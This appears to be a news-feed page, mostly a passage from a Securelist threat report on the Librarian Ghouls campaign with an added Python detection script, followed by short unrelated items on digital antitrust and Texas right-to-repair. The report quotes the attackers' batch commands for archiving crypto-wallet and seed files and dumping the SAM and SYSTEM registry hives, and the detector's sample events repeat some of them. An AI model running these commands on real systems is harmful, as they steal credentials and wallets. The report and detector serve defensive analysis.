$TaskSettings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable -WakeToRun
# Registering task in Task Scheduler
Register-ScheduledTask -Action $Action -Principal $Principal -Trigger $Trigger -TaskName "WakeUpAndLaunchEdge" -Settings $TaskSettings -Force

Contents of the “wol.ps1” script

This script launches Microsoft Edge every day at 1 AM. We found no evidence of msedge.exe being replaced or compromised, leading us to believe it is a genuine Microsoft Edge executable. This daily browser activation wakes the victim’s computer, giving attackers a four-hour window to establish unauthorized remote access with AnyDesk before the scheduled task shuts the machine down at 5 AM.

Following the execution of the PowerShell script, bat.bat removes the curl utility, the Trays.rar archive, and the AnyDesk installer. The attackers no longer need these components: at this stage of the infection, all necessary malicious files and third-party utilities have been downloaded with curl, Trays.rar has been unpacked, and AnyDesk has been installed on the device.

After that, the batch file sets environment variables for Blat. These variables contain, among other things, the email addresses where the victim’s data will be sent and the passwords for these accounts.

The next step is to collect information stored on the device that is of interest to the attackers:

  • Cryptocurrency wallet credentials and seed phrases
  • Dumps of the HKLM\SAM and HKLM\SYSTEM registry keys made with reg.exe


%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*парол*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*карт*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*кошельк*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\wallet.dat /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*wallet*.doc* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*wallet*.txt /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*seed*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\keystore.json /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*bitcoin*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*usdt*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*ethereum*.* /y
reg save hklm\sam %SYSTEMDRIVE%\Intel\sam.backup
reg save hklm\system %SYSTEMDRIVE%\Intel\system.backup

Data collection by bat.bat

The BAT file uses driver.exe to pack data it has collected into two separate password-protected archives. Then, the script runs blat.exe to send the victim’s data and AnyDesk configuration files to the attackers via SMTP.

Miner installation and self-deletion


Next, bat.bat deletes the files generated during the attack from the C:\Intel\ folder and installs a crypto miner on the compromised system. To do this, the script creates a bm.json configuration file containing the mining pool address and the attackers’ identifier, and then downloads install.exe from hxxp://bmapps[.]org/bmcontrol/win64/Install.exe.

install.exe is an installer that checks for the JSON configuration file and the bmcontrol.exe process in the system. If the process is detected, the installer terminates it.

Then, install.exe downloads an archive with mining tools from hxxps://bmapps[.]org/bmcontrol/win64/app-1.4.zip.

The archive contains the following files:

  • _install.exe: a new version of the installer. While the samples in the attacks we analyzed were identical, we suspect the attackers have a scenario for updating the malware.
  • bmcontrol.exe: miner controller
  • run.exe, stop.cmd, uninstall.cmd: tools for starting, stopping, and removing the controller
  • XMRig miner

Depending on the parameters of the JSON file, the unmodified original installer file is used, or _install.exe is renamed to install.exe and run. After that, the installer adds run.exe to autorun. This utility checks for an already running bmcontrol.exe controller on the compromised system, and if it doesn’t find one, runs it from the downloaded archive.

Once running, bmcontrol.exe creates two processes: master and worker. The master process launches and constantly monitors the worker, and also restarts it if the latter quits unexpectedly. In addition, the master passes the JSON configuration file to the worker process.

Before launching the XMRig miner, the worker process collects the following system information:

  1. Available CPU cores
  2. Available RAM
  3. GPU

This data is used to configure the miner on the compromised device and also sent to the attackers’ server. While XMRig is running, the worker maintains a connection to the mining pool, sending a request every 60 seconds.

After installing the miner on the system, bat.bat removes itself from the victim’s device.
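The bat.bat behaviours described above, written as detection logic over process-creation command lines. This is an added example, not code from the report and not the vendor's YARA rule; the rule names, the event layout and the sample events are constructed here, and the patterns are taken from the commands quoted on this page. Because every tool in the chain is legitimate software, a host is flagged only when several distinct behaviours occur close together in time.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Rule names are made up for this example; the patterns mirror the bat.bat
# command lines quoted in the report. Each command on its own is dual-use.
RULES = {
    "anydesk_unattended_password": re.compile(
        r'anydesk(\.exe)?"?\s+--set-password', re.I),
    "defender_control_disable": re.compile(
        r'(^|[\\\s"])dc\.exe"?\s+/D\b', re.I),
    "sleep_or_hibernate_disabled": re.compile(
        r'\bpowercfg(\.exe)?\s+([-/]h\s+off'
        r'|[-/]change\s+-(standby|hibernate)-timeout-ac\s+0)\b', re.I),
    "forced_shutdown_task": re.compile(
        r'\bschtasks(\.exe)?\s+/create\b.*\bshutdown\s+/s\b', re.I),
    "sam_system_hive_dump": re.compile(
        r'\breg(\.exe)?\s+save\s+hklm\\(sam|system)\b', re.I),
    "wallet_keyword_archiving": re.compile(
        r'\sa\s+-r\s.*(wallet|seed|keystore|bitcoin|usdt|ethereum'
        r'|парол|карт|кошельк)', re.I),
}

def match_rules(cmdline):
    """Return the names of all rules whose pattern occurs in cmdline."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def score_hosts(events, threshold=3, window_minutes=30):
    """Flag hosts where >= threshold distinct rules fire within one window."""
    window = timedelta(minutes=window_minutes)
    hits = defaultdict(list)
    for ev in events:
        names = match_rules(ev["cmdline"])
        if names:
            hits[ev["host"]].append((datetime.fromisoformat(ev["time"]), names))
    flagged = {}
    for host, rows in hits.items():
        rows.sort(key=lambda r: r[0])
        best = set()
        for i, (start, _) in enumerate(rows):
            seen = set()
            for ts, names in rows[i:]:
                if ts - start > window:
                    break
                seen.update(names)
            if len(seen) > len(best):
                best = seen
        if len(best) >= threshold:
            flagged[host] = sorted(best)
    return flagged

def _ev(host, time, cmdline):
    return {"host": host, "time": time, "cmdline": cmdline}

# Constructed sample events (not real telemetry). HOST-A replays the chain
# from the report; HOST-B shows ordinary administration that must not alert.
SAMPLE_EVENTS = [
    _ev("HOST-A", "2025-05-14T10:02:00",
        r"cmd.exe /c echo QWERTY1234566 | AnyDesk.exe --set-password _unattended_access"),
    _ev("HOST-A", "2025-05-14T10:02:05", r"C:\Intel\dc.exe /D"),
    _ev("HOST-A", "2025-05-14T10:02:10", r"powercfg -h off"),
    _ev("HOST-A", "2025-05-14T10:02:15",
        r'schtasks /create /tn "ShutdownAt5AM" /tr "shutdown /s /f /t 0" /sc daily /st 05:00'),
    _ev("HOST-A", "2025-05-14T10:02:40",
        r"C:\Intel\driver.exe a -r -[REDACTED] C:\Intel\wallet.rar C:\*seed*.* /y"),
    _ev("HOST-A", "2025-05-14T10:02:50", r"reg save hklm\sam C:\Intel\sam.backup"),
    _ev("HOST-B", "2025-05-14T09:00:00", r"powercfg -h off"),
    _ev("HOST-B", "2025-05-14T09:05:00",
        r"reg save hklm\software D:\backup\software.hiv"),
    _ev("HOST-B", "2025-05-14T09:10:00",
        r'schtasks /create /tn "NightlyBackup" /tr "C:\Tools\backup.cmd" /sc daily /st 02:00'),
]

if __name__ == "__main__":
    for host, rules in score_hosts(SAMPLE_EVENTS).items():
        print(host, rules)
```

The threshold and window are tuning knobs: lowering the threshold to 1 turns every administrator who disables hibernation into an alert, which is the trade-off the campaign's reliance on legitimate utilities forces.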

Legitimate software utilized by the attackers


It is a common technique to leverage third-party legitimate software for malicious purposes (T1588.002), which makes detecting and attributing APT activity more difficult. We have seen this pattern in current campaigns by various APT groups, in particular in the Likho cluster.

Beyond the utilities discussed above, we also identified the following software in Librarian Ghouls attacks:

  • Mipko Personal Monitor: a DLP system that the attackers use to monitor the victim. The application can collect screenshots and record keystrokes among other things.
  • WebBrowserPassView: a password recovery utility that can extract passwords stored in web browsers. The attackers use this to steal victims’ credentials.
  • ngrok: a global reverse proxy that secures and accelerates network services. Used by the attackers to connect to target machines.
  • NirCmd: a legitimate utility that facilitates various OS tasks without a visible user interface. The attackers use this to covertly run scripts and executables.


Phishing campaign


Our investigation revealed several domains that we assess with low confidence to be associated with the ongoing Librarian Ghouls campaign. At the time of the investigation, some of them remained active, including users-mail[.]ru and deauthorization[.]online. These domains hosted phishing pages, generated with PHP scripts and designed to harvest credentials for the mail.ru email service.

Example of a phishing page associated with the APT campaign

Infrastructure


The implant detailed in this article communicated with the command-and-control servers downdown[.]ru and dragonfires[.]ru. Both resolve to the IP address 185.125.51[.]5.

Our analysis of the attackers’ infrastructure revealed a notable characteristic: several malicious web servers associated with this campaign had directory listing enabled, allowing us to inspect files they stored.

Directory listing on a malicious server

Victims


Our telemetry indicated that, during the investigation period, hundreds of Russian users fell victim to this campaign. It primarily focuses on industrial enterprises, with engineering schools also being a target of interest. Furthermore, the attacks described also impacted users in Belarus and Kazakhstan.

The phishing emails are notably composed in Russian and include archives with Russian filenames, along with Russian-language decoy documents. This suggests that the primary targets of this campaign are likely based in Russia or speak Russian.

About the attackers


Librarian Ghouls APT exhibits traits commonly associated with hacktivist groups, such as the use of self-extracting archives and a reliance on legitimate, third-party utilities rather than custom-built malware binary modules.

Since the beginning of the current campaign in December 2024, we have seen frequent updates to the implants, which vary in configuration files and the bundled sets of legitimate utilities. At the time of publishing this, our data encompassed over 100 malicious files connected to this campaign.

Takeaways


At the time of this report’s release, the Librarian Ghouls APT campaign described in it is still active, as evidenced by attacks we observed in May 2025. Consistent with previous activity, the attackers leverage third-party legitimate utilities rather than developing custom tools. All of the malicious functionality still relies on installer, command, and PowerShell scripts. We observe that the attackers are continuously refining their tactics, encompassing not only data exfiltration but also the deployment of remote access tools and the use of phishing sites for email account compromise. We constantly monitor this threat actor and will continue to share up-to-date information about its activity.

Indicators of compromise


* Additional indicators of compromise and a YARA rule for detecting Librarian Ghouls activity are available to customers of our APT Intelligence Reporting service. Contact intelreports@kaspersky.com for more details.


Legitimate software


AnyDesk
Blat
curl
Defender Control
Customized RAR 3.80
Mipko Personal Monitor
ngrok
NirCmd
4t Tray Minimizer
WebBrowserPassView



securelist.com/librarian-ghoul…



The internal battle of digital antitrust


IT'S MONDAY, AND THIS IS DIGITAL POLITICS. I'm Mark Scott, and will be making a flying visit to Brussels this week. If you're around and want to grab coffee on June 11, drop me a line here. My colleagues are holding a webinar on June 12 about the upcoming United Nations Internet Governance Forum. You can watch along here at 9am ET / 3pm CET.

— We're entering a new era of digital competition enforcement that pits Big Tech companies' vested interests against each other.

— The traditional approach to tackling foreign interference is woefully out of date. It's time for a rethink.

— Europe's decade-long push to combat state-backed online disinformation and cyber attacks.

Let's get started:



digitalpolitics.co/newsletter0…



Texas’ Right to Repair Bill is a Signature Away From Becoming Law


In what could be a big step forward for consumer rights, the Texas Senate recently unanimously voted to pass HB 2963, which references the “Diagnosis, maintenance, and repair of certain digital electronic equipment”. If signed by the governor, this would make Texas the ninth US state to enact such a law, and the seventh pertaining to consumer electronics. Interestingly, this bill saw anti-parts pairing language added, which is something that got stripped from the Oregon bill.

Much like other Right to Repair bills, HB 2963 would require manufacturers to make spare parts, documentation and repair tools available to both consumers and independent repair shops. If signed, the act would take effect in September of 2026. Included in the bill are provisions to prevent overcharging for the provided parts and documentation.

As for how useful this is going to be for consumers, [Louis Rossmann] had a read of the bill and gave his typically eloquent thoughts. The tl;dw is that while there is a lot of stuff to like, this bill leaves open potentially massive loopholes (e.g. assemblies vs parts), while also carving out massive exemptions, which leaves owners of game consoles, boats, cars, tractors, home appliances, etc. stranded with no new options.

youtube.com/embed/C_ohgeWKcOY?…


hackaday.com/2025/06/09/texas-…